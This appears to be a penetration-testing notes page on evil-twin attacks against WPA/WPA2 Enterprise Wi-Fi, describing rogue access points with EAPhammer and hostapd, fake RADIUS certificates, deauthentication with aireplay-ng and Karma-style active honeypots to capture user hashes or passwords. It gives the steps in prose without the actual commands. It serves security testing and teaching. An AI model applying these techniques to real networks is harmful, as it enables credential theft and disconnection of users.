Evil-Twin Attack
Eaphammer
The Evil Twin Attack against a WPA/WPA2 Enterprise network involves the creation of a fake access point (honeypot) connected to a radius server controlled by the attacker. The attacker will wait for an unadvised client to authenticate to the fake AP and accept the server certificate which was presented to him. When the client accept the server certificate from the attacker radius server, a TLS tunnel could be established between the client and the server. The attacker will be able to read the packets send by the client during the authentication process and could be able to retrieve the user hash or password.
To incite the users to connect to the fake AP and accept the rogue certificate, the attacker need to create a fake access point and a rogue certificate with similar properties (such as BSSID) to the legitimate one.
WPA Enterprise
Create a fake certificate. This certificate will be presented to the client when he connects to the fake AP.
Create a fake access point and radius server user can connect to
Then, using aireplay-ng
, perform a deauthentication attack to disconnect targeted clients from the legitimate access point and to force them to connect to our honeypot.
The success of this attack depends on multiple factors such as the presence of competitive signals in the environment. A strength signals from legitimate access point could prevent users to connect to our rogue access point.
Some considerations
Network Manager can not be enabled on wlan0 during this attack. Use a BSSID that is similar to a legitimate BSSID, but not exactly the same Use the exact same Network name (ESSID) (social engineering)
During an intrusion testing with a limited time frame, we can create a fake AP with a random name and ask the client to connect to it to impersonate a client that would connect to the fake AP. The client should be prompted with a log on box where he's invited to enter its credentials. The client credentials should be created in EAPhammer.
Active vs Passive Honeypot
Passive Honeypot: A passive honeypot does not perform any action to incite the users to connect. It just get created and the attacker is waiting for the user to connect.
Active Honeypot: Active honeypot make use of the Karma Attack to force users to connect to the rogue AP. The rogue AP will listen for the client probe requests and will respond with a proper probe response with the same ESSID.
An active honeypot can also implies sending deauthentication packets to the AP to force users to disconnect from the legitimate AP and then reconnect to the rogue AP.
Hostapd
Configuration file for rogue WPA/WPA2 access point.
Resources
Ryan, Gabriel. (2019). Modern Wireless Tradecraft Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Here
Last updated